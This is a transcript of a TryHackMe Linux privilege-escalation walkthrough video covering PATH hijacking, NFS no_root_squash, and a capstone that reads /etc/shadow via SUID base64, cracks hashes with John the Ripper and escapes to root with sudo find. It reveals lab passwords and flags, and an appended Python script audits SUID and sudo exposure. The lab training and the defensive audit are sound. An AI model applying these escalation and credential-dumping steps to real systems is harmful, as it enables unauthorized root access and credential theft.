cron jobs can you see on the target system? If we go back there's four: antivirus, antivirus, backup and test. What was the contents of flag5? So we'll cd /home, cd ubuntu (I hate that you can't tab it), and there's flag5.txt, there's our contents right there.

What is Matt's password? For Matt's password, guys, I'm not going to do it for you, just in the interest of time; I am going to tell you how to do it so you guys can do this. You've already seen me do this, and you should have already done it yourself. All you're going to do for Matt's password (you'll notice I'm going to lose this connection here) is open the password file and the shadow file, copy Matt's hash out of each of them, just like we did with the whole file before but just Matt's, pull it out, and then save it as a password and a shadow, and then unshadow it to combine them, and then use John the Ripper with the rockyou.txt wordlist to crack the hash. I'm not going to do that one for you guys; the password is 123456, if that's all you want out of this. I would prefer that you guys actually learned it, but that's just me.

Now we're diving into privilege escalation: PATH. Hopefully so far you guys are with me, because there's a lot of information thrown at you. So, PATH (sorry, that sounds weird, why I'm saying that). First thing we've got to do again is ssh into it; it'll tell us the thing here: karen@10.10.189.64. For some reason it denied it; hopefully I started the right thing. That was weird, whatever, maybe it wasn't up yet. So what is a PATH, first off? If you echo $PATH you'll see that there are paths that you basically are defaulted to, if you will. Someone sets this, your administrator, and it's not you. It's a variable is what it is, but it can be changed; keep that in mind, any variable can be changed. You can see here we have /usr/local/sbin, /usr/local/bin, /usr/ blah blah blah, and so on and so forth. So if a folder for which your user has write permissions is located in the PATH, meaning if we can write to any of these folders, then we can actually hijack an application to run a script, meaning we can point our application to PATH and it will use that. Hopefully that makes sense; if it doesn't, you guys can read a little bit more about it. These ones are a little bit more complex than we have time to cover in just this little video, and when I say a little more complex, they're not more complex, it's just that if you're not familiar with Linux you're not going to understand it right away; that's the only difference. So first thing we need to find out is what folders are located under PATH, which we've got here, and keep in mind that we can actually modify
this; we can add to it. So, does your current user have write privileges for any of these folders? This is what we've got to do: find the write privileges, see whether we can write to any of these, because if we can't write to them then we don't have the vulnerability. So first thing, we already searched for the PATH, we've already figured that out, and here's our list of paths. Now we need to search for writable folders, so we're going to say find / -writable (it's important that you know you're searching for writable), then 2>/dev/null and all that jazz; you don't want all the errors. You might want them, I don't know. Now this part I'm just throwing in there to save you some time, you don't have to do this: cut -d, which is the delimiter, "/", that's where we want to cut it, and then -f 2,3. If you guys aren't familiar with this command that's okay, this is just saving you time, because you can do it with just a regular find, it will just take you a long time. Then sort. So this just gives us a clean version of what it is; you don't have to do this. It's going to take a sec because it's still processing a bunch of stuff. So you can see we're getting a lot of stuff. Well, the ones we're looking for, we're really looking for something that's basically out of the norm, if you will. Like right here, it's very weird that we have /home/murdoch; why would we be able to write to Murdoch's home folder? That's weird, so that right there tells me that's probably in our write access. We'll echo the PATH again just to see. Mind you guys, there's more searching going on typically in this, but because I already know the answer... And it gives you that same command right here, and there you go, boom boom boom. You can see here that from this, like I said, we have write permissions for his home folder, which is again strange. But now if we went into his folder we would find the flag, because we have permissions to look into his folder, obviously. So there's the odd folder, that's the answer. Exploit the PATH vulnerability to read the contents of the flag: what they want us to do is this exact thing. It's going to be pretty easy. Give me a sec, we'll go through this; I want to make sure that I'm not skipping steps for you guys, because like that one I skipped and gave you a big command. I want to make sure you guys understand the process. I know we're an hour into this video, but I want to make sure you understand it and it's not something where you're just getting the answers from me, if that makes sense. So we have Murdoch, he's killing it. If we actually look at his home, /home/murdoch, you can see there's a test file and there's a thm Python file. That's kind of weird, so what I'm going to do is go into those files because I want to know what they are. So /home/murdoch, and if you do an ls -la you can see that the test here is actually an executable. That's interesting, so let's go ahead and run it; it's a test, what's it matter? We're just going to see what it does (didn't mean to hit the second one). You notice right there it says "thm: not found", so it's looking for a file named thm. That's very interesting, because what that means is if we can put a file in its PATH, hence this PATH, if we can put a file there named thm it will run it, because that's all it's looking for; it doesn't know what that thm file is supposed to be, it has no idea. So we're going to put that in there. First things first, we'll obviously have to create it. Sorry, I'm just looking for which one, what the executable we're going to create is, the actual binary. We can look at this thm.py, because I don't even know what that is; I never looked at it in the last one, I just created one. So this looks like it's actually just a Python script running. Cool. So now what we're going to do is create a script named thm, so vim thm, because that's the file it needs. There are different ways to do this; this is the way I like to do it: #!/bin/bash, and then what do we want to say? We want it to give us root access, basically, is what we really want. But we don't have to do that; to save us some time we can just say sudo su, because it's allowed to switch to the root user, and leave it at that. So let's see if that works, let's see if that saves. So now if we run the test... it's still looking for thm, so we need to change that permission, probably, because it probably can't execute it, so chmod thm. And now... thm: not found. The reason for that is we need it to be in one of these paths, most likely, the one that we need, so let's go ahead and find the one that we need. What we need to do is add it, so we need to export: what we're doing is adding to the PATH that we already know exists, these ones up here; we need to add his home directory, export PATH=/home/murdoch:$PATH. Now what this is going to do is tell the application that this is in the PATH, and to look through this path for the thm, which is what it's looking for. And you see right there, it looked for thm in our paths and it found it, and look, now it says root. So now we're root, all because all we did was sudo su. So now we can look for that flag. Actually we're not going to search for it, because of the time, because I know it takes forever; we're just going to cat it, I know where it is: cat /home/matt/flag6.txt. There it is, it's in Matt's home directory, which is simple. Hopefully that made sense, you guys. I know I kind of got confused there for a second, because on my other one, when I did this before, I did it in the temp directory, so I was confused as to why I wasn't seeing the temp directory in here, but it's because I created it at the beginning last time rather than the end. Hopefully that didn't confuse you. But basically, if you're trying to figure out what I did, all it was was: you have write permissions to paths here; if you can find out which paths you have write permissions to, then write to them, and then add that path, and an application that you run will look in the paths that you have access to for whatever it's trying to run. So you can basically create a secondary script that it calls upon, which is what we did there.

NFS privilege escalation. This one's pretty simple; I don't think it's nearly as complex as some of the other examples, but we'll cover it anyway. Basically, long story short, what we're doing here is network file shares: we're looking to mount one of the file shares, that's supposed to be a network file share, to our computer. When we mount it to our computer, we now control the permissions, so we can give it sudo permissions so that we can run with sudo permissions on that network
file share, which then runs on the server that it's sitting on. Most of the time this is going to be disabled, but if it's not... So what we're looking for when we look at them here is no_root_squash, that's right there, that's what we're looking for. What that means is, if they have it, it means that we can actually create our own executable with the SUID bit, meaning when we run it on the target system it runs as sudo; it allows us to do it from our side no matter what permissions are set on the other side. So keep that in mind. It's not as common anymore, because it's extremely insecure, right? If you can set the permissions for files on your box, what's the point of me setting any permissions? So that's why it's not really secure, but that's all right.

So, Karen, we're back at it with Karen again: karen@10.10.27.143, yes, we're in. What we're going to do is cat /etc/exports, which is going to show us the file shares. You can see here these are examples, they're commented out, so don't worry about those, but you can see you've got /home/backup and /tmp and then the shared folder. /tmp has no_root_squash, so I'm just going to use the /tmp folder; you can use any of these three if you wanted to, I just personally like using /tmp, that's just me. So what we're going to do (we don't have to go on here, but I like to go on here) is cd /tmp, ls, and then create a directory: mkdir tmp, cd tmp. I like to be in a temporary directory if I'm going to do this, because I know I'm basically going to delete it. There are a couple of commands we can do; we see here what they've got, but we can actually do a showmount. So this is going to show us what is actually mountable. (Excuse me, I did that for the wrong box.) We can say showmount -e 10.10.27.143, and what we're doing is basically requesting they tell us what shares they have that are mountable, meaning which ones we can mount to our machine as a network share. If we hit it, there's our /tmp right there, so that's the one we're going to target. Now, we already made the directory I want to mount it on, so now let's mount it: mount 10.10.27.143:/tmp, and it's important that you know which one you're looking at, we're looking at just /tmp, and then /tmp/tmp. Now if we hit ls (we have to back up one), cd tmp, ls, you can see that we actually have things in here, and those are the same things that should be in their /tmp folder, the same exact things. So now if we create a script in here, we can set the permissions on our machine on the network file share and then run it on the target machine. Hopefully that makes sense to you guys: this is our machine, and we're going to try and get it to where we can run it on their machine. So now we're going to create the payload. This is super simple; it's the same one they have over here, this main. I'm just going to do it on here, because we can save it wherever we want. You can always find these pretty much anywhere: setuid, and then system, we just need to specify what we want, and we want /bin/bash. It's finishing it for us, so that's good; that's usually a good sign, when it knows the coding language and finishes it for you it means you're doing it correctly, usually. So File, Save As, and we'll just save this as nfs, for network file share, and we'll actually go to Other Locations, Computer, /tmp/tmp, and save it in here. Now we've saved it, we need to look at it and set that SUID, because if we don't then it can't run the way we need it to. So first thing, we need to compile it, because it does take a compiler (if I could talk). I forgot to save it with a .c, so we'll mv nfs nfs.c. Now we'll compile it; the .c just specifies that it needs compiling, that's just the type of file it is, so keep in mind that it does need that. Then we're going to write it out to nfs, just regular nfs is fine; you guys can name them whatever you want. So now we do want to change it to make the owner root. You don't necessarily have to make the owner root, I don't believe, but I do think it's best practice on these just so you don't run into any issues. Now the chmod is obviously necessary, to add the SUID bit that we've been looking for. Hopefully this makes sense to you guys: this nfs, we just did all that from our machine, but because we've mounted that network drive, all we've got to do is go over here on theirs and we should be able to run this simply as us, and it should run as root. You can see right there, we've got root access. What it is is that we're using that same setuid, but we just set it from our machine, because it gave us that permission, it allowed us to do that; that's all it's doing.

Now, how many mountable shares can you identify on the target? There's three; you can see that back here, it was /tmp, /home/ubuntu/sharedfolder and /home/backup. How many shares have no_root_squash? All of them do, so three. Gain a root shell: we did that. Now what's the content of the flag? cd /home, cd matt probably, yep, cat flag7.txt, and there's our flag number seven.

Now the capstone challenge. This one, they just give you basically nothing, and you'll see it's pretty easy after you've done all these boxes; you'll see they gave you a pretty easy one, which I like, because we've been going for an hour and sixteen and I've been trying to rush through it, which is kind of why I've been all over the place. This is why I thought about breaking the video up into two, but that's okay, this is fine, because this is one of those things where if you do the work, meaning you actually sit here and do it, you'll understand it; if you don't, you won't. So if you just watch it and then go finish the box, you're not going to understand this anyway, so I'm not necessarily directing this at those people. So now the capstone challenge: we've got to log in. Now we have Leonard and Penny, so we no longer have the silly Karen; we've got Leonard and Penny. This one is kind of a different, multi-step process, which I like, because this is more realistic of what you'd be looking at in a real situation; it's not going to be necessarily as easy as we've seen, you're going to have a little bit of struggle, and I think this is a little bit better example because there are multiple steps in it. So ssh in as leonard, and it may take a sec because it may not be up all the way yet; maybe, we'll see. Now I will tell you guys, I'm not going to look for kernel exploits in this like I normally would; I would normally start searching for them, looking for version numbers and stuff. I'm not going to do that because of the time factor, but normally that's what I would recommend doing. We already know what we're trying
to do, so I wouldn't get too crazy worried about that, but I would worry about why we can't ssh into it: 10.10.64.144, yep. Well, while that's figuring itself out we'll go ahead and talk about it. Basically, the first thing we're going to do on this one is the same thing we did on, I believe it was either the sudo or the SUID one, I can't remember which, but basically we're going to look for the SUID bit set, which is the same thing we did before, and the base64 on this one allows us to use base64 again. So ssh leonard@10.10.64.144. I have no idea why ssh isn't working on it; of course it's going to do it now, there we go. And then his password is Penny123, and we're just going to do that instead of this because that one wasn't working. So we're in as leonard. First thing we would do is the same thing we normally do: enumerate and find the fault. The first one I found is the base64, so we can do the base64 just like before: base64 /etc/shadow | base64 --decode, and you can see we get all these entries. Now, you don't necessarily have to copy all of them, you can copy one or two, but I like to have them all. So we'll paste this, this is the shadow file, Save As, and I'll save it under Desktop just to make it easy, as shadow.txt. Then from there we'll do the password file: the exact same thing, but instead of shadow do passwd, and take that. Now make sure you don't go too far, because earlier I went too far and started copying the shadow file again, so keep that in mind. Paste, File, Save As, back to Desktop, and we'll say password.txt. So we've got those two, that's perfect. We'll minimize that for a second; whoops, open new terminal, I don't like that, I'll open a new tab. So we've got the base64, we've got that, we're good. Now we need to unshadow. Well, first let's just go to our Desktop. We don't even need sudo because we're already root, so unshadow password.txt shadow.txt > cracked.txt, like we did before, boom. Now we just need john --wordlist= and /usr/share/wordlists/rockyou.txt (if you guys are wondering, this is the location for rockyou every single time) and our cracked.txt, and we'll let it run and hopefully this will find it. Well, there's Missy's password, so we have Missy's password right there, so we can log in as missy. So now let's go back here and switch user: su missy, and her password was Password1. By the way, if you feel froggy you could just guess that. So now we're going to say ls, let's see, find... actually I'm not even going to look for it, I'm just going to go into it: cd Documents, but
normally you would find it cat flag one dot txt all right and there it is so thm four two eight two four two eight two eight seven one nine nine two zero five four four all right there's the first flag now the problem is we still don't have root permissions we could sit here and wait for this and it might eventually get the root password i don't know if it's in there um but that's not what we want to do so now what do we have to do well that's pretty easy we just have to find um let's see we just have to figure out what he what they can run as sudo which i'm not gonna necessarily waste the time with you guys we've already done this it's the find command you can actually use the find command again so go ahead and use the sudo find like we did before except for you're gonna go ahead and go on gtfo bins and look for this find command and find what you can run with it so we're gonna do find and this is just in the presence of time guys i normally would go through all this but we've already covered it time or two or three times by the time we get to the end i'm not gonna keep covering it um so there's been shell and then the quit boom and you'll see that we now have who am i and we have root so now we can find the um regular flag which is okay there it is flag oh that's flag one excuse me so cd home route cd home okay root flag smooth all right so now cat flag2.txt and there it is guys so it's thm one six eight eight two four seven eight two three nine zero two three eight that's it guys hopefully you guys like this i know it's really long there's a lot to watch but i really did take my time on this to try and find the best way i even wrote it up over here for me to find the best way to explain things to you guys while also still letting you guys do it and also not my biggest concern here was trying to um get all the knowledge there without making this video five hours right because you could dive into these so much deeper but i think it's important that you guys 
understand it and know how to research it not how to memorize it which i think is important so hopefully you guys like it if you did subscribe like it this was a really long video to make um it took me like probably nine or ten hours to make because i had to do the boxes then find a way to make it make sense on a video then record it so on so forth so hopefully you guys liked it this was a very long video but i definitely think it's really good information and we have one more video guys and then we're done with the freaking series so let's go thank you guys and i really appreciate it we're reached 300 subs so let's go guys thank you so much
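Added here as an example that is not from the video or from TryHackMe: a small Python audit that takes the two enumeration outputs the capstone relies on (the SUID file listing and `sudo -l`) and flags the binaries that GTFOBins documents as giving a shell or an arbitrary file read, which is exactly how a SUID base64 exposed /etc/shadow and sudo find gave root above. The binary sets are a hypothetical subset of GTFOBins, the hostname `capstone` is a placeholder, and both sample outputs are constructed rather than captured from the machine.

```python
import re
from dataclasses import dataclass

# Hypothetical subset of binaries GTFOBins documents with a "shell"
# or "file-read" function; extend it from the GTFOBins site for real use.
SHELL_ESCAPE = {"find", "vim", "vi", "nano", "less", "more", "awk",
                "python", "python3", "perl", "env", "nmap", "man", "ftp"}
FILE_READ = {"base64", "cat", "head", "tail", "xxd", "cut", "od",
             "strings", "grep", "diff"}


@dataclass
class Finding:
    kind: str      # "suid" or "sudo"
    path: str      # binary or rule the finding refers to
    reason: str


def classify(binary: str):
    """Return why a binary is risky when run with elevated rights, or None."""
    name = binary.rsplit("/", 1)[-1]
    if name in SHELL_ESCAPE:
        return "shell escape (GTFOBins 'shell')"
    if name in FILE_READ:
        return "arbitrary file read (GTFOBins 'file-read')"
    return None


def audit_suid(listing: str):
    """listing: the output of `find / -perm -4000 -type f 2>/dev/null`."""
    findings = []
    for path in listing.splitlines():
        path = path.strip()
        reason = classify(path) if path else None
        if reason:
            findings.append(Finding("suid", path, reason))
    return findings


# One `sudo -l` rule line: "(runas) TAG: cmd1, cmd2"
_SUDO_RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(text: str):
    """Parse the rule lines of `sudo -l` into (runas, nopasswd, command)."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = _SUDO_RULE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmd").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def audit_sudo(text: str):
    """Flag sudo rules that hand out a shell or a file read via GTFOBins."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        tag = "NOPASSWD " if nopasswd else ""
        if cmd == "ALL":
            findings.append(Finding("sudo", cmd, f"{tag}unrestricted sudo as ({runas})"))
            continue
        binary = cmd.split()[0]
        reason = classify(binary)
        if reason:
            findings.append(Finding("sudo", binary, f"{tag}sudo as ({runas}) allows {reason}"))
    return findings


# Constructed sample outputs (not captured from the THM machine).
SUID_SAMPLE = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/base64
/usr/bin/mount
"""

SUDO_L_SAMPLE = """\
Matching Defaults entries for missy on capstone:
    env_reset, mail_badpass

User missy may run the following commands on capstone:
    (ALL) NOPASSWD: /usr/bin/find
"""


def run_audit(suid_listing=SUID_SAMPLE, sudo_l_output=SUDO_L_SAMPLE):
    return audit_suid(suid_listing) + audit_sudo(sudo_l_output)


if __name__ == "__main__":
    for f in run_audit():
        print(f"[{f.kind}] {f.path}: {f.reason}")
```

Run on a real host by piping `find / -perm -4000 -type f 2>/dev/null` and `sudo -l` into the two functions; anything it reports is a candidate for removing the SUID bit or tightening the sudoers rule, which is the fix for both steps of the capstone.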
Info
Channel: stuffy24
Views: 17,189
Keywords: pc, linux, computer, hacker, try, hack, me, be, try hack me linux, hacked, pawned, pwnd, hacking, email, port, scans, common, ftp, rdp, https, SSH, vulnerability, metasploit, framework, meta, sploit, exploit, exploitation, meterpreter, what, the, shell, thm, privelage, escalation, privEsc, enumeration, try hack me walkthrough, try hack me privilege escalation, linux operating system, linux privilege escalation tryhackme, linux privilege escalation, linux privilege escalation suid, try hack me beginner, try hack me review
Id: cRLDmWWyblQ
Length: 86min 17sec (5177 seconds)
Published: Wed Feb 23 2022